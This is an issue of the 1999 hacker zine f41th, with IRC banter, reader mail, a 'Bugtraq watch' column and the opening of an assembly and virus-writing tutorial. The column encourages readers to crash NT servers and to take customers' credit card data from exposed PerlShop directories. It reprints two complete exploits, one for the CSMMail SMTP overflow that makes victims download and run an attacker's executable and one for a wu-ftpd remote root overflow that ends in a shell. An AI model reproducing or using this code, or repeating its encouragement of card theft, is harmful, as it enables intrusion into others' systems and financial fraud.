Copy Link
Add to Bookmark
Report
f41th Issue 05
yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|
[f41th Issue 5 June 1999] [c] D4RKCYDE 1999
[darkcyde.system7.org] [#darkcyde EFNET]
'f41th, chOice of the real phreak'
'f41th - Die Wahl des wahren Phreak'
'find us on the PSTN bitch'
'Zu finden auf dem PSTN bitch'
--> Index ]----oooo-------------------------------oooo----[ f41th 5! ]------
-->]OO[::::[ Editorial ]:::::::[OO--[ hybrid ]---
-->]OO[::::[ Letters to f41th ]:::::::[OO--[ you ]---
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ bodie ]---
-->]OO[::::[ Assembly coding and virii ]:::::::[OO--[ bodie ]---
-->]OO[::::[ SS7 network conponments ]:::::::[OO--[ digiphreq ]---
-->]OO[::::[ Electronic data ]:::::::[OO--[ zomba ]---
-->]OO[::::[ Linux system security ]:::::::[OO--[ zomba ]---
-->]OO[::::[ Zombas bonus phone warez ]:::::::[OO--[ zomba ]---
-->]OO[::::[ Scan of O8OO 252 ]:::::::[OO--[ shadow ]---
-->]OO[::::[ IRC logz ]:::::::[OO--[ #darkcyde ]---
-->]OO[::::[ Wireless E-911 Service ]:::::::[OO--[ digiphreq ]---
-->]OO[::::[ Introduction to carding ]:::::::[OO--[ Kryptus ]---
-->]OO[::::[ Political views ]:::::::[OO--[ nino ]---
-->]OO[::::[ Outness ]:::::::[PP--[ hybrid ]---
[ random quotes from tonekilla - he wonders why he's not in ]
[ darkcyde anymore - a) lame b) idle c) pisses me off on irc. ]
<tonekilla> its like: | suck hybrid's cock for ops | <-- yEp
<tonekilla> motherfuckers stop <-- nope
<tonekilla> NINO IS MY FUCKING BRO <-- heh?
<tonekilla> dont tell me to relax <-- why?
<tonekilla> i dont give a fuck <-- we know
<tonekilla> well FUCK YOU <-- ok
<tonekilla> FUCK YOU <-- OK
<tonekilla> FUCK YOU HYBRID <-- no
<tonekilla> what the fuck is your problem?
<tonekilla> you didnt get banned for no fucking reason from a
channel you properly ran for 3 months then someone
comes in, kicks and bans you and fucking turns it
into a dynasty
*** DTMFslut sets mode: +b *!*tonekilla@*.tecinfo.com
*** tonekilla was kicked by DTMFslut
(banned: learn some manners bitch) <---- well said
----[ shoutz [ special shouts to kryptis (we'll miss ya bro) ]----------
----------------[ simmeth digitalfokus mobsters bosplaya osiris ]----------
----------------[ * WERD WERD WERD WERD WERD WERD WERD WERD WERD ]----------
----------------[ shadowx ch1ckie subz gr1p ph1x tip gb shylock ]----------
----------------[ prez_ jasun xio psyclone knight oclet nino dave ]----------
----------------[ b4b0 9x phunc deadsoul aktive sonicborg asshair ]----------
----[ memberz
----------------[ hybrid downtime force zomba bodie digiphreq elf ]----------
----------------[ mortis alphagod lowtek | new member: shadowx ]----------
| new member: postalphreak
| new member: nino
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Editorial ]:::::::[OO--[ by hybrid ]------[ hybrid@phunc.com ]--
-->[OO]:::::::::::::::::::::::::::::[ http://www.phunc.com/~hybrid ]:::::::::
Hi there, yep, we made it to another issue, this time it's even better :> We
got bodie's new column [SUIDCYDE] and even more leet info. It's now spring,
so we've decided to do a spring clean of darkcyde.. for starters all the
idle people, ie: tonekilla, have been kicked out, and we've decided to
improve the qaulity of the zine, cuting down on the codez, and increasing the
info. I'm not writting anything for this issue cuse I've done enough already,
I'm the one who has to put all this stuff together, and keep it all organised,
etc. I'd like to say one thing to the dudes in #darkcyde efnet, that are
bitching about shit.. It's irc, nothing more. HEH, take a look at the logs
our bot (DTMFslut) recorded of the channel - at the end of this issue. Welp,
theres my leeto editorial done, now I gota stick this stuff into 14-inch
screen format, does'nt ms-dos edit 0wn? -cya on irc #darkcyde.
hybrid
http://www.phunc.com/~hybrid <---- my site, check it out.
-->]OO[::::[ Mail ]:::::::[OO--[ you ]---------------------------------------
you have new mail
#pine
From bennygill@gmx.net Sun May 9 22:30:52 1999
Date: Sun, 9 May 1999 22:15:04 +0100
From: Ben J. Gill <bennygill@gmx.net>
To: hybrid@phunc.com
Subject: f41th ISSUE IIII
Hiya ,
Don't want to be a smart ass , but I just read f41th ISSUE IIII and
noticed that you translated the heading into German .
I happen to be a German Phreak living in the UK ( London ) at the moment
and couldn't help but notice that the transl. isn't quite what it should
be . Here's my Version :
'f41th, chOice of the real phreak'
'f41th - Die Wahl des wahren Phreak'
'find us on the PSTN bitch'
'Zu finden auf dem PSTN bitch'
I dunno what a PSTN bitch is , but "bitch" is not a "Weibchen" in German
, bitch = "Nutte , Hure"
Hope I wasn't too much of a smart ass , but I just couldn't help it ;o)
Ben
http://bennygill.home.pages.de
ICQ : 10302953
mail :
Phrenetic@gmx.net ( H/P mails )
bennygill@gmx.net ( Personal mails )
funkymonkey@geek.com ( Tech / News Mails )
---------[ Thanks for the interest in our/my bad German skillz.
---------[ HEH, look I spelt it correctly this time... :)
---------[ #screen -r
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]---
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Welcome to the new regular hacking section in faith, this section is devoted
to the latest news, techniches and exploits in hacking. Enjoy
----------
Bugtraq watch
As a regular colum now in faith i'll be telling everyone what is going on in
the worlds greatest mailing list - bugtraq, it's where all the latest
exploits get posted to and it's the best list for security.
Recently there have been several bugs reported. Possibly the most severe one
was a report of being able to remotly reboot an NT machine. This is how to
do it:
find an NT box running SP4 (service pack 4)
Telnet to port 1723
type 256 'h' charictors and hit return
Press ^D
This hopefully should cause the machine to completely reboot and cause
microshaft a few more headaches which is always good news for our favorite
linux servers :). This bug hasn't been confirmed yet and some people haven't
been able to get it to work, but give it a go anyway
Possibly the most serious flaw uncovered recently was an exploit in some
online shopping services, some of these are run on a software package called
perlshop. With this you can get peoples credit card info which is always
nice :)
For this one all you have to do is find a site running the software (it may
tell you that it is on the web page) and go to the directory:
www.vulnerable.com/store/customers/
or it may be in:
www.vulnerable.com/store/temp_customers/
This bug is likely to be fixed extreemly quickly so if ya wanna exploit it,
ya better hurry up :)
There has also been reported buffer overflows in the windows CSMMail SMTP
server. Time for some exploit code:
<--------------------------CUT HERE------------------------->
#define UNIX
#ifndef UNIX
#include <stdio.h>
#include <fcntl.h>
#include <winsock.h>
#include <io.h>
#define CLOSE _close
#define SLEEP Sleep
#else
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define CLOSE close
#define SLEEP sleep
#endif
/*
CSMMail Exploit by _mcp_ <pw@nacs.net>
Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>
Greets go out to the following people: Morpheus, Sizban, Rocket,
Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
and #win32asm.
You can contact me by e-mail or on efnet.
As always no greets go out to etl
*/
const unsigned long FIXUP1 = 264;
const unsigned long FIXUP2 = 268;
const unsigned long OFFSET = 260;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
"\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
"\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
printf("Usages: \n");
printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
printf("win98 SP1:\n");
printf(" <fixup address> = 0xBFF78030\n");
printf(" <return address> = 0xBFF79243\n");
printf("NT SP3:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E53FC7\n");
printf("NT SP4:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E9A3A4\n");
printf("Will make <target host> running CSMMail download, save, and\n");
printf("execute http://<www site>/~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 5) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0)
{
printf("Input Error, the fixup memory address has incorrect format\n");
exit(0);
}
if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=FIXUP1;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr2=ptr;
ptr2+=FIXUP2;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr+=OFFSET;
memcpy ((void *) ptr,(void *)&ret_addr, 4);
ptr+=60;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) - 1 );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, "HELO lamer.com\r\n",16, 0);
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, "HELO lamer.com\r\n",16);
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
<--------------------------CUT HERE------------------------->
Also there has been another buffer overflow found in wu-ftpd, a popular ftp
deamon for unix servers. This only exists in beta versions 12 - 18, and
these aren't the current version, so don't be supprised if you find that not
too many servers are running it.
<--------------------------CUT HERE------------------------->
/*
* Remote/local exploit for wu-ftpd [12] through [18]
* gcc w00f.c -o w00f -Wall -O2
*
* Offsets/padding may need to be changed, depending on remote daemon
* compilation options. Try offsets -5000 to 5000 in increments of 100.
*
* Note: you need to use -t >0 for -any- version lower than 18.
* Coded by smiler and cossack
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";
unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
struct type {
unsigned long ret_address;
unsigned char align; /* Use this only to offset \xff's used */
signed short pad_shift; /* how little/much padding */
unsigned char overflow_type; /* whether you have to DELE */
char *name;
};
/* ret_pos is the same for all types of overflows, you only have to change
the padding. This makes it neater, and gives the shellcode plenty of
room for nops etc
*/
#define RET_POS 190
#define FTPROOT "/home/ftp"
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
{ 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
{ 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
{ 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
{ 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", },
{ 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", },
{ 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", },
{ 0,0,0,0,NULL }
};
struct options {
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;
/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
char *argv0,ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen,ctr,d;
FILE *cin;
int fd;
struct in_addr victim;
argv0 = strdup(argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
switch (d) {
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
break;
case 's':
strcpy(opts.start_dir,optarg);
break;
case 'o':
opts.offset = atoi(optarg);
break;
case 't':
opts.t = atoi(optarg);
if ((opts.t < 0)||(opts.t>5)) {
printf("Dont have that type!\n");
exit(-1);
}
}
}
argc -= optind;
argv += optind;
if (argc < 3)
usage(argv0);
if (!resolv(argv[0],&victim)) {
perror("resolving");
exit(-1);
}
strcpy(opts.username,argv[1]);
strcpy(opts.password,argv[2]);
if ((fd = tcp_connect(victim,21)) < 0) {
perror("connect");
exit(-1);
}
if (!(cin = fdopen(fd,"r"))) {
printf("Couldn't get stream\n");
exit(-1);
}
Fgets(inbuf,sizeof(inbuf),cin);
printf("%s",inbuf);
if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
fatal("Bad username\n");
if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
fatal("Bad password\n");
if (*opts.start_dir)
if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
fatal("Couldn't change dir\n");
if (ftp_command(inbuf,257,cin,"PWD\n")<0)
fatal("PWD\n");
if (parse_pwd(inbuf,&pwdlen) < 0)
fatal("PWD\n");
srand(time(NULL));
printf("Making padding directorys\n");
for (ctr = 0;ctr < 4;ctr++) {
ltr = rand()%26 + 65;
memset(outbuf,ltr,194);
outbuf[194]=0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
}
/* Make padding directory */
ctr = 124 - (pwdlen - types[opts.t].align);//180
//ctr = 152 - (pwdlen - types[opts.t].align);
ctr -= types[opts.t].pad_shift;
if (ctr < 0) {
exit(-1);
}
memset(outbuf,'A',ctr+1);
outbuf[ctr] = 0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
memset(outbuf,0x90,195);
d=0;
for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up(types[opts.t].ret_address-opts.offset,ret_string);
strcpy(outbuf+RET_POS,ret_string);
strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
printf("Press any key to send shellcode...\n");
getchar();
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
fatal("DELE\n");
/* HEH. For type 1 style we add a dele command. This overflow
occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
not checking bounds correctly, overwriting path[] in delete(). */
RunShell(fd);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
return;
}
int double_up(unsigned long blah, char *doh)
{
int a;
unsigned char *ptr,*ptr2;
bzero(doh,6);
ptr=doh;
ptr2=(char *)&blah;
for (a=0;a<4;a++) {
*ptr++=*ptr2;
if (*ptr2==0xff) *ptr++=0xff;
ptr2++;
}
return(1);
}
int parse_pwd(char *in, int *pwdlen)
{
char *ptr1,*ptr2;
/* 257 "/" is current directory */
ptr1 = strchr(in,'\"');
if (!ptr1) return(-1);
ptr2 = strchr(ptr1+1,'\"');
if (!ptr2) return(-1);
*ptr2 = 0;
*pwdlen = strlen(ptr1+1);
/* If its just "/" then it contributes nothing to the RET_POS */
if (*pwdlen==1) *pwdlen -= 1;
printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
return(1);
}
int tcp_connect(struct in_addr host,unsigned short port)
{
struct sockaddr_in serv;
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
serv.sin_port = htons(port);
serv.sin_family = AF_INET;
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
return(-1);
}
return(fd);
}
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
va_list va;
char line[1200];
int val;
va_start(va,fmt);
vsprintf(line,fmt,va);
va_end(va);
if (write(fileno(out),line,strlen(line)) < 0)
return(-1);
bzero(buf,200);
while(1) {
Fgets(line,sizeof(line),out);
#ifdef DEBUG
printf("%s",line);
#endif
if (*(line+3)!='-') break;
}
strncpy(buf,line,200);
val = atoi(line);
if (success != val) return(-1);
return(1);
}
void fatal(char *string)
{
printf("%s",string);
exit(-1);
}
char *Fgets(char *s,int size,FILE *stream)
{
char *ptr;
ptr = fgets(s,size,stream);
//if (!ptr)
//fatal("Disconnected\n");
return(ptr);
}
int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hostname,addr))
return(1);
res = gethostbyname(hostname);
if (res == NULL)
return(0);
memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
int usage(char *program)
{
fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
fprintf(stderr,"\t[-o offset] [-t type]\n");
fprintf(stderr,"types:\n");
fprintf(stderr,"0 - %s\n", types[0].name);
fprintf(stderr,"1 - %s\n", types[1].name);
fprintf(stderr,"2 - %s\n", types[2].name);
fprintf(stderr,"3 - %s\n", types[3].name);
fprintf(stderr,"4 - %s\n", types[4].name);
fprintf(stderr,"5 - %s\n", types[5].name);
fprintf(stderr,"\n");
exit(0);
}
<--------------------------CUT HERE------------------------->
Thats about all for the moment. If you want to subscribe to bugtraq
yourself, send a mail to bugtraq@netspace.org with the text subscribe bugtraq
<your e-mail> in the body of the message
Bodie
----------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Assembly language programing and virri ]:::::[OO--[ by Bodie ]--
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Part 1
A lot of people think that writting virii is a hard thing to do, the truth
is, it's reletivly easy, but it does take a bit of assembly language
knowlege. In this file i will show ya a little assembly programming and how
to make a simple virus (so all you script kiddies out there can also create
something like mellisa - the kewlest peice of programming on the face of the
planet :)) But learning assembly language doesn't have to be a completely
impossible task, although it probably is a little harder than learing your
average C clone. To understand this you will need a basic knowlege of binary
numbers. This isn't hard really. One person once said to me, "languages are
like druggies, the higher they are, the easier they are to get on with, but
the less use they are to you :)"
Assembly language is more than that though, it gets to the centre of the
hacker mentality, it allows you to screw with the exact working of the
computer, some say you can't be a hacker unless you know assembly language, I
disagree but hacking is about making a computer do something it isn't
supposed to do, and how can ya do that unless you know exactly how things are
working inside the computer?
BASICS
Assembly language programming is different depending on which processor you
have, but I know the intel chips best, so i will write this for those chips,
for other chips the instructions may be totally different.
REGISTERS
To learn Assembly language you need a basic understanding of the design of
the chip that your writing for. An intel chip is made up of things called
registers. These are places in a chip where a number can be stored and
manipulated. There are four types of registers, general purpose registers,
index registers, segment registers and stack registers. The first type is
the general purpose registers. There are 4 general purpose registers, EAX,
EBX, ECX and EDX. These are 32-bit registers. These registers can be split
up into smaller 16-bit registers called, AX, BX, CX and DX, and these can be
further split into 8-bit registers called [A-D]H and [A-D]L. They are
arrange mainly like this.
<-------------E[A-D]X------------>
_________________________________
| | | |
| [A-D]L | [A-D]H | |
|________|________|_______________|
<-----[A-D]X----->
The next type of register is called a Stack Register. There are 2 stack
registers, called BP and SP, as you might have guessed, these are used mainly
on the stack. SP is the stack pointer, it tells you where the next item on
the stack is place, but more on that later.
Index Registers are used to hold data on the current program running. IP is
the most important of these, as it tells the computer where the next
instruction to be executed is located. You can't directly mainpulate it
(that means you can't put a number directly into it - althought there are
other ways of having fun with it :)) Other index registers are
EDI(Destination index) and ESI(source index) Again these can be split into SI
and DI, but unlike general purpose registers, they can't be split any
further.
Segment and offset registers are responsible for accessing memory locations.
This is an system that has been left over for compatability with older 16-bit
chips, because in a 16-bit register, you could only access 32K memory
locations, the chip designers devised a way to use 2 registers to access a
memory location, this allows you to access enough memory for almost anyone.
The segment is the lower half of the location and it can be held in any
segment register. These are CS, DS, ES, SS, FS and GS. The offset can be
held in any general purpose register.
THE STACK
Another place to store data is on the stack. Like the name suggests, this is
just an area where the data is piled when you need to clear a register for
something else, but still need the data to be retrieved later. The stack
works on a 'last in, first out' (LIFO) principal. This means that the last
item of data to be put on to the stack is the first to come off, when you
take data from the stack. When you put an item of data on to the stack it
goes on the highest memory location available in the stack, and then the
stack pointer (SP) is set to point to the last item put onto the stack. This
is so that the computer knows where the last item is located. The stack is
arranged like this.
___________
| |
| |
| data (1) |
|___________|
| |
| |
| data (2) |
|___________| <--------Stack Pointer (SP)
| |
| |
| |
| Free |
| Space |
| |
| |
|___________| <--------Stack Segment (SS)
In this example, data 3 would be the first to be returned when a process is
accessing the stack, this is because data 2 was the last item to be put on
the stack. If another item was to be put on the stack it would be put into
the free space area and the stack pointer would be moved to represnt this.
This would then be the first irem to be returned.
VARIABLES
Variables are easily defined in assembly language, just like any other
language. The way to do it is
[variable_name] [type] [value]
a comman usage of this would be:
hello db "hello!!!$" ; sets a variable of type db to "hello"
all strings in assembly language have to be terminated with a $ symbol. The
variable type we are using is db, this is the common type for strings like
this, there are other variable types, i will tell you these later.
SOME INSTRUCTIONS
The structure of an assembly language program is very different from the
structure of a program in a higher level language. It consists of a series
of 1 line instructions. Some instructions are:
MOV [destination] [source]
The destination has to be a register, but the source can be either an
imediate value or the contents of another register.
mov ax 10 ; moves the value 10 into the register ax
mov bx cx ; moves the value of the register cx into bx
the ; represents the end of an instruction. anything after this is a comment
PUSH [data]
Puts data onto the stack
POP [register or variable]
puts the first value on the stack into the register or variable
push ax ; puts the value of ax onto the stack
push bx ; puts the value of bx onto the stack
pop ax ; puts the first value on the stack into ax
pop bx ; puts he next value on the stack into bx
This program would swap the values of registers ax and bx.
INT [number]
this is a command which calls an interupt from either DOS or the BIOS. This
allows you to do things like write to the screen or opening a file or
something. There may be several subroutines that can be called from each
interupt number. These are distinguished between by using the register ah.
mov ah 9 ; this tells the int command to call subroutine 9 from the
interupt
int 21h ; this calls interupt 21, which is the standard DOS
interupt
In this program subroutine 9 tells the system to print something to the
screen. More on this later.
>From this we can write our first program.
-------------------cut here--------------------
printed db "hello fucker$" ; creates the variable 'printed'
mov dx OFFSET printed ; sets dx to the offset of the variable 'printed'
mov ax SEG printed ; sets ax to the offset of the variable 'printed'
mov ds ax ; moves ax (containing the segment) to ds - because
; ds the main segent register this now means that
; ds:dx is pointing to the variable 'printed'
mov ah 9;
int 21 ; this prints our message to the screen
mov ah 4c00h;
int 21h ; this executes subroutine 4c00 in 21h, this ends the program
END; this ends the program
-------------------cut here--------------------
This is the simplest program in assembly language. It just prints the
message "hello" to the screen. All strings in assembly language have to be
terminated with the $ charicter
Like in most other languages, you can define procedures in assembly language.
You do this like this
.
.
